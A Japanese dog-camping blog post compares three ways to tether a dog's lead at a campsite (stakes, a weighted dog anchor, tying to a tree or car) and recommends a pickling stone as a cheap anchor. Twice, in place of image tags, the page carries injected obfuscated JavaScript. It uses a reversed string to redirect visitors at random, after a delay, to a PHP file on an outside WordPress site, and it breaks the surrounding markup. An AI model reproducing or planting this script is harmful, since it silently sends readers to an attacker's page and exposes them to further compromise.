犬連れキャンプでリードを固定する方法3選|おすすめのドッグアンカーをご紹介

犬連れキャンプでリードを固定する方法3選|おすすめのドッグアンカーをご紹介

犬連れキャンプでリードを固定する方法3選|おすすめのドッグアンカーをご紹介

犬連れキャンプでリードを固定する方法3選|おすすめのドッグアンカーをご紹介

  • 犬連れキャンプで愛犬を係留する方法がわからない・・・
  • リードはどこに固定するのがベスト?
  • オススメのドッグアンカーを教えて!

犬連れキャンプでは愛犬を係留する必要があります。

係留方法を間違えるとリードが愛犬に絡まったり、最悪の場合愛犬が脱走してしまう可能性もあります。

JIN
JIN
我が家は年間30泊ほど犬連れキャンプに行き、3通りの係留方法を実践しています。

 

この記事では愛犬のリードを固定する3つの方法のメリット・デメリット、ドッグアンカーの代用品について解説しています。

 

この記事を参考にしてリードを固定すれば、初めての犬連れキャンプでも安心して係留することができ、脱走する心配もありません。

犬連れキャンプでリードを固定する方法は以下の3つです。

・ペグ

・ドッグアンカー(重り)

・リードを木や車に繋ぐ

また、ドッグアンカーの代用品としては「漬物石」が安価でオススメ。

犬連れキャンプでリードを固定する3つの方法

犬連れキャンプでリードを固定する3つの方法

犬連れキャンプでリードを固定する方法は3つ!

  1. ペグ
  2. アンカー(重り)
  3. リードを木や車に繋ぐ
ペグアンカー木・車
価格×
携帯性×
移動できるか×
テント内・外内・外

愛犬のリード固定方法|①ペグ

愛犬のリード固定方法|①ペグ

ペグで固定する方法は1番オーソドックスで、多くの犬連れキャンパーが実践しています。

係留用ペグはホームセンターなどでも購入できるので、入手しやすいです。

JIN
JIN
3つの方法の中で1番耐荷重が大きいです!

 

メリット

・安価

・荷物にならない

デメリット

・移動ができない

・テント内では使えない

愛犬のリード固定方法|②ドッグアンカー(重り)

愛犬のリード固定方法|②ドッグアンカー(重り)

ドッグアンカー(重り)にリードを固定する方法です。

店頭では売っていないので、基本的にネットで購入します。

JIN
JIN
置くだけで係留できるので、公園などでも使えます!

 

メリット

・置くだけなので簡単

・テント内でも使える

・移動もできる

デメリット

・高価

オススメのドッグアンカーについてはこちらの記事で解説しています。

【レビュー】K9アンカーはテント内でも係留できてアウトドアにオススメ!大型犬にも!

ドッグアンカーの代用品はあるの?

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tone.jpg” alt=”ドッグアンカーの代用品はあるの?” width=”636″ height=”477″ />

ドッグアンカーの代用品はあります。

それは「漬物石」です。

K9アンカーのようなドッグアンカーは高価なので、何個も購入すると経済的に厳しい。

そこで我が家は20kgの漬物石で愛犬(21kg)を係留しています。

漬物石は20kgでも2,000円代ととても安価。

20kgあれば大型犬でも係留できます。

JIN
JIN
ただ見た目がダサいというのが難点・・・

 

キャンプではK9アンカー、自宅では漬物石で係留しています。

愛犬のリード固定方法|③直接リードを繋ぐ

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-wood.jpg” alt=”愛犬のリード固定方法|③直接リードを繋ぐ” width=”636″ height=”477″ />

直接リードを車や木に固定する方法です。

リードを固定するには「ラフウェア」のリードがオススメ。

愛犬のリード固定方法|③直接リードを繋ぐ

リードの手持ち部分にバックルが付いているので、いつでも簡単に係留することができます。

愛犬のリード固定方法|③直接リードを繋ぐ

手持ち部分の輪っかは調節できるので、大きな木でも固定することができます。

メリット

・荷物が増えない

デメリット

・場所が限定される

・係留できるリードが必要

ラフウェアのリードについてはこちらの記事で詳しく解説しています。

ラフウェアのリーシュは使いやすい!?実際に使ってみた感想とオススメの選び方をご紹介します!

犬連れキャンプで寝るときはどの係留方法が良い?

犬連れキャンプで寝るときはどの係留方法が良い?

犬連れキャンプで寝るときは「ドッグアンカー(重り)」で係留するのがオススメ!

テント内なのでペグは打ち込むことができません。

ペグを打ち込めないからといってフリーにさせると脱走する危険性もあるので必ず係留しましょう。

犬連れキャンプでの寝る方法についてはこちらの記事で詳しく解説しています。

愛犬とキャンプで寝るときの4通りの方法!それぞれのメリット・デメリットも解説!

犬連れキャンプでは状況に合わせてリードを固定しよう!

犬連れキャンプでは状況に合わせてリードを固定しよう!

犬連れキャンプでリードを固定する方法は以下の3つです。

  1. ペグ
  2. ドッグアンカー(重り)
  3. リードを木や車に繋ぐ

キャンプではテント内・外かによって係留する方法が変わってきます。

それぞれの状況に適した係留方法でリードを固定しましょう。

犬連れキャンプの始め方については以下の記事で詳しく解説しています。

【初心者向け】犬連れキャンプの始め方や楽しみ方、犬用グッズ、オススメのキャンプ場、役立つノウハウ、注意点

関連記事

【初心者向け】犬連れキャンプの始め方や楽しみ方、愛犬用グッズ、オススメのキャンプ場、役立つノウハウ、注意点 初めて犬連れキャンプに行くけど・・・ 何を揃えたらいいのかわからない。 犬連れキャンプでも愛犬も飼い主も快[…]

【初心者向け】犬連れキャンプの始め方や楽しみ方、犬用グッズ、オススメのキャンプ場、役立つノウハウ、注意点
犬連れキャンプでリードを固定する方法3選|おすすめのドッグアンカーをご紹介
最新情報をチェックしよう!